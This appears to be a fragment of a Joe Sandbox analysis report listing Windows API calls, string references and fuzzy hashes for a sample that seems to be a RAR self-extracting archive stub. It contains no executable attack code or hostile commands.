                                                                                                                                      • Part of subcall function 0036B92D: _wcsrchr.LIBVCRUNTIME ref: 0036B944
                                                                                                                                    • _wcslen.LIBCMT ref: 0036C197
                                                                                                                                    • _wcslen.LIBCMT ref: 0036C1DF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$_wcsrchr
                                                                                                                                    • String ID: .exe$.rar$.sfx
                                                                                                                                    • API String ID: 3513545583-31770016
                                                                                                                                    • Opcode ID: 255ed14aba28fa9f6abd28a4019d216b0be9ff758ab633ca3d9bf819e58c145a
                                                                                                                                    • Instruction ID: f53bdbbb0828b154a5d8168c9cb284c519b9219790794572d348b0018d496d65
                                                                                                                                    • Opcode Fuzzy Hash: 255ed14aba28fa9f6abd28a4019d216b0be9ff758ab633ca3d9bf819e58c145a
                                                                                                                                    • Instruction Fuzzy Hash: C7417A22560315D5CB33AF748812A7BB3A8EF42704F11E90EFCD6AF189EB648D81C395
                                                                                                                                    APIs
                                                                                                                                    • _wcslen.LIBCMT ref: 0036BB27
                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0036A275,?,?,00000800,?,0036A23A,?,0036755C), ref: 0036BBC5
                                                                                                                                    • _wcslen.LIBCMT ref: 0036BC3B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$CurrentDirectory
                                                                                                                                    • String ID: UNC$\\?\
                                                                                                                                    • API String ID: 3341907918-253988292
                                                                                                                                    • Opcode ID: 222c2e2fd026fe256d5bc87831745935413ace9d7e8eb2e73144506ae8ef160e
                                                                                                                                    • Instruction ID: 6735344d2a343eaf59fdcd5fa15fca07410fc994f2c3070e3a82ccfde8cbf5e1
                                                                                                                                    • Opcode Fuzzy Hash: 222c2e2fd026fe256d5bc87831745935413ace9d7e8eb2e73144506ae8ef160e
                                                                                                                                    • Instruction Fuzzy Hash: A141807144021AA6CF23AF60CC41EEEBBADAF45390F11C466F858EB155EB74DAD08F60
                                                                                                                                    APIs
                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0037CD84
                                                                                                                                      • Part of subcall function 0037AF98: _wcschr.LIBVCRUNTIME ref: 0037B033
                                                                                                                                      • Part of subcall function 00371FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0036C116,00000000,.exe,?,?,00000800,?,?,?,00378E3C), ref: 00371FD1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcschr$CompareString
                                                                                                                                    • String ID: <$HIDE$MAX$MIN
                                                                                                                                    • API String ID: 69343711-3358265660
                                                                                                                                    • Opcode ID: efc0e6e51bb3b490050ee1fd474fcbacd58773ac74d647f8d7ca46d4ada45b79
                                                                                                                                    • Instruction ID: 92502b3dccdba0436e7f5a49566d49f7586f568b6a0bfcc3705236e72029d8a6
                                                                                                                                    • Opcode Fuzzy Hash: efc0e6e51bb3b490050ee1fd474fcbacd58773ac74d647f8d7ca46d4ada45b79
                                                                                                                                    • Instruction Fuzzy Hash: AD3173769006099ADF37DB64CC41AEE73BCAB15351F01C56AE509E7180EBB89E848FA1
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(00000000), ref: 0037AAD2
                                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0037AB01
                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0037AB99
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ObjectRelease
                                                                                                                                    • String ID: -7$77
                                                                                                                                    • API String ID: 1429681911-1903741993
                                                                                                                                    • Opcode ID: e9a28d38778e3459e8e98041ff15b2ef503305afd8fbebc4e3a716ca3f8b91df
                                                                                                                                    • Instruction ID: ea53bf1250d3ec79fab6327fb7ed571e237db98eccecb7e37b4017c5efd6d953
                                                                                                                                    • Opcode Fuzzy Hash: e9a28d38778e3459e8e98041ff15b2ef503305afd8fbebc4e3a716ca3f8b91df
                                                                                                                                    • Instruction Fuzzy Hash: 3C21E7B2148314AFD302AFA5DC48E6FBBFDFF89351F044819FA46D2120D631AA548B62
                                                                                                                                    APIs
                                                                                                                                    • _swprintf.LIBCMT ref: 0036B9B8
                                                                                                                                      • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0036B9D6
                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0036B9E6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                                                    • String ID: %c:\
                                                                                                                                    • API String ID: 525462905-3142399695
                                                                                                                                    • Opcode ID: 56de613b3d3299b1ad5c85fd43c3b772eb30d850f170b6f4530900311597b6aa
                                                                                                                                    • Instruction ID: 9d58c613aa123bef1580ceffecf3f80cf3bb0a74bd8e7ea492f703a3d719e8dc
                                                                                                                                    • Opcode Fuzzy Hash: 56de613b3d3299b1ad5c85fd43c3b772eb30d850f170b6f4530900311597b6aa
                                                                                                                                    • Instruction Fuzzy Hash: E901F56350431169DA327B75CC46D6BE7ECEE92770B40C80AF544DA086EB20D880C7B1
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
                                                                                                                                      • Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370
                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0037B2BE
                                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0037B2D6
                                                                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 0037B304
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                                    • String ID: GETPASSWORD1$xz;
                                                                                                                                    • API String ID: 445417207-2733714143
                                                                                                                                    • Opcode ID: c5e05b726ddd47977b9a4f4bc4087ea411143576ea19b401430dbe0486a190be
                                                                                                                                    • Instruction ID: aaca5da2ead4615f1e82f3310eee6081177a73f72f05bc1357f94e1f6d03fa39
                                                                                                                                    • Opcode Fuzzy Hash: c5e05b726ddd47977b9a4f4bc4087ea411143576ea19b401430dbe0486a190be
                                                                                                                                    • Instruction Fuzzy Hash: C8110836900118BADB339A649C49FFFB77CEF09704F108420FA49F6580D7A8A9418771
                                                                                                                                    APIs
                                                                                                                                    • LoadBitmapW.USER32(00000065), ref: 0037B6ED
                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0037B712
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0037B744
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0037B767
                                                                                                                                      • Part of subcall function 0037A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0037B73D,00000066), ref: 0037A6D5
                                                                                                                                      • Part of subcall function 0037A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A6EC
                                                                                                                                      • Part of subcall function 0037A6C2: LoadResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A703
                                                                                                                                      • Part of subcall function 0037A6C2: LockResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A712
                                                                                                                                      • Part of subcall function 0037A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0037B73D,00000066), ref: 0037A72D
                                                                                                                                      • Part of subcall function 0037A6C2: GlobalLock.KERNEL32(00000000), ref: 0037A73E
                                                                                                                                      • Part of subcall function 0037A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0037A762
                                                                                                                                      • Part of subcall function 0037A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0037A7A7
                                                                                                                                      • Part of subcall function 0037A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0037A7C6
                                                                                                                                      • Part of subcall function 0037A6C2: GlobalFree.KERNEL32(00000000), ref: 0037A7CD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                                    • String ID: ]
                                                                                                                                    • API String ID: 1797374341-3352871620
                                                                                                                                    • Opcode ID: 549f191ce5fb60ed2a9792c0ec0dbf2ca3a403bb7d018b1fd711f4e938ffda67
                                                                                                                                    • Instruction ID: 7a7a3df8906a998b67ae55fb60b60262799672eaf4262e6c4021dd0291dd2517
                                                                                                                                    • Opcode Fuzzy Hash: 549f191ce5fb60ed2a9792c0ec0dbf2ca3a403bb7d018b1fd711f4e938ffda67
                                                                                                                                    • Instruction Fuzzy Hash: BD01D63650061567C73377745C09F7FBABE9FC1752F058015F948EB291DF298D055262
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
                                                                                                                                      • Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370
                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0037D64B
                                                                                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0037D661
                                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0037D675
                                                                                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 0037D684
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                                    • String ID: RENAMEDLG
                                                                                                                                    • API String ID: 445417207-3299779563
                                                                                                                                    • Opcode ID: 77177dd0745cc5f97dce611145660a38449693f4d314a17bb79dc8fda1099f9a
                                                                                                                                    • Instruction ID: 26f95472457fc859ab6fd3e617bdf89ba183339bd339c2489b084fa1ba18f480
                                                                                                                                    • Opcode Fuzzy Hash: 77177dd0745cc5f97dce611145660a38449693f4d314a17bb79dc8fda1099f9a
                                                                                                                                    • Instruction Fuzzy Hash: 21012833284214BED2335F649E09F577B7CEF5AB05F528110F30AA20D1C7A6AA04D775
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00387E24,00000000,?,00387DC4,00000000,0039C300,0000000C,00387F1B,00000000,00000002), ref: 00387E93
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00387EA6
                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00387E24,00000000,?,00387DC4,00000000,0039C300,0000000C,00387F1B,00000000,00000002), ref: 00387EC9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                    • Opcode ID: 51365cbb093e2d6a4a4e89ff9f7c4a8c6777e934877558b71a94cd9eaa35a1d2
                                                                                                                                    • Instruction ID: 7eb14ccea3bca64735d86088b063b4e1905a37e659de7895792277ed6dd0a381
                                                                                                                                    • Opcode Fuzzy Hash: 51365cbb093e2d6a4a4e89ff9f7c4a8c6777e934877558b71a94cd9eaa35a1d2
                                                                                                                                    • Instruction Fuzzy Hash: 4FF06871905208BBDB139FA5DC09BDEBFB9EF44711F1140AAF805A2250DB369E40CB90
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0037081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00370836
                                                                                                                                      • Part of subcall function 0037081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0036F2D8,Crypt32.dll,00000000,0036F35C,?,?,0036F33E,?,?,?), ref: 00370858
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0036F2E4
                                                                                                                                    • GetProcAddress.KERNEL32(003A81C8,CryptUnprotectMemory), ref: 0036F2F4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                                    • API String ID: 2141747552-1753850145
                                                                                                                                    • Opcode ID: 5798e71cf246aca09ccf341690c944b8d0a4d6ae59af9e6bfda00cf2d240b91b
                                                                                                                                    • Instruction ID: daa69d6c08429cdd73b4cd569cb064c86be681b67bea8b42274026684d3e31b0
                                                                                                                                    • Opcode Fuzzy Hash: 5798e71cf246aca09ccf341690c944b8d0a4d6ae59af9e6bfda00cf2d240b91b
                                                                                                                                    • Instruction Fuzzy Hash: 51E046B4950742AEDB239B38A849B82BAD86F04714F14C82EE0DAA3750DAB5D9808B50
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AdjustPointer$_abort
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2252061734-0
                                                                                                                                    • Opcode ID: b9ed5c438fc79169bc836d2550e4382bcd1d7a1e389fbafd71f0029857a54b14
                                                                                                                                    • Instruction ID: 3b66058a598dc26359ee8f061d45583c1248038ad394f034436094c91f550bdb
                                                                                                                                    • Opcode Fuzzy Hash: b9ed5c438fc79169bc836d2550e4382bcd1d7a1e389fbafd71f0029857a54b14
                                                                                                                                    • Instruction Fuzzy Hash: 5551CF71600312AFDB2BAF14D845BBBB7B4BF54310F2545AAEC124B6A1E731AD44D790
                                                                                                                                    APIs
                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0038BF39
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0038BF5C
                                                                                                                                      • Part of subcall function 00388E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0038CA2C,00000000,?,00386CBE,?,00000008,?,003891E0,?,?,?), ref: 00388E38
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0038BF82
                                                                                                                                    • _free.LIBCMT ref: 0038BF95
                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0038BFA4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 336800556-0
                                                                                                                                    • Opcode ID: 0eb4aaf83f7348e5acec297865699de0bbdf29a5c2a00933275ee3f58f2d9860
                                                                                                                                    • Instruction ID: aa546c02a6206b82010c38a5808e7e187247a32b1a51df217a23ef8a7d333074
                                                                                                                                    • Opcode Fuzzy Hash: 0eb4aaf83f7348e5acec297865699de0bbdf29a5c2a00933275ee3f58f2d9860
                                                                                                                                    • Instruction Fuzzy Hash: D401D8B66013127F632336B65C8CC7BEB6DDEC2B903150199FA04C6211EF618D0186B0
                                                                                                                                    APIs
                                                                                                                                    • GetLastError.KERNEL32(?,?,?,003891AD,0038B188,?,00389813,00000001,00000364,?,00383F73,00000050,?,003A1030,00000200), ref: 0038986E
                                                                                                                                    • _free.LIBCMT ref: 003898A3
                                                                                                                                    • _free.LIBCMT ref: 003898CA
                                                                                                                                    • SetLastError.KERNEL32(00000000,?,003A1030,00000200), ref: 003898D7
                                                                                                                                    • SetLastError.KERNEL32(00000000,?,003A1030,00000200), ref: 003898E0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
